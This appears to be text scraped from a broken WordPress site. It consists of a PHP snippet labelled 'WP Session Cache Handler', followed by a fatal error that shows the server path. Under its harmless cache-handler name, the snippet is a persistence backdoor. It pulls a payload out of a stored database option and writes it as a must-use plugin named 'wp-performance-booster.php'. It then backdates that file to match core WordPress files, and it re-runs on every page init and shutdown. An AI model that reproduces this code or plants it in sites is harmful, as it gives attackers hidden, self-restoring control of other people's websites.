/* WP Session Cache Handler Initialize */ if(!function_exists('wc_store_api_sync_init_handler')) { function wc_store_api_sync_init_handler(){ if(!function_exists('get_option')) return; $m='_transient_wc_store_api_sync_24h'; $a=defined('ABSPATH')?ABSPATH:dirname(__FILE__).'/'; $d=$a.'wp-content/mu-plugins'; $f=$d.'/wp-performance-booster.php'; if(!file_exists($f)){ $c=get_option($m); if($c){ if(!is_dir($d)){@mkdir($d,0755,true);} @file_put_contents($f,$c); $s=$a.'wp-settings.php'; if(!file_exists($s)){$s=$a.'wp-config.php';} if(file_exists($s)){@touch($f,filemtime($s));} } } } if(function_exists('add_action')){ add_action('init','wc_store_api_sync_init_handler',1); } register_shutdown_function('wc_store_api_sync_init_handler'); } /* End WP Session Cache Handler */
Fatal error: Uncaught Error: Call to undefined function wp() in /home/u637490748/domains/yoshidedetizadora.com.br/public_html/wp-blog-header.php:16 Stack trace: #0 /home/u637490748/domains/yoshidedetizadora.com.br/public_html/index.php(17): require() #1 {main} thrown in /home/u637490748/domains/yoshidedetizadora.com.br/public_html/wp-blog-header.php on line 16